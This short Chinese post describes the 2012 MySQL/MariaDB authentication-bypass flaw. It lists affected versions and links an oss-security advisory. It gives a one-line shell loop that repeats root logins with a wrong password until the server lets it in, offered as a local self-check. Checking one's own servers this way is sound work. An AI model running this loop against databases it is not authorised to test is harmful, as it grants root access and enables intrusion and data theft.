六月份出的了
前两天,mysql爆了个较严重的编译漏洞登录验证问题
受影响版本有
All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 arevulnerable.MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
更多详情可看 这里:http://seclists.org/oss-sec/2012/q2/493
for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
直接在终端命令行上执行上面一行,如能看到提示
mysql>
则说明存在此问题,如果没任务提示或显示,则是没有问题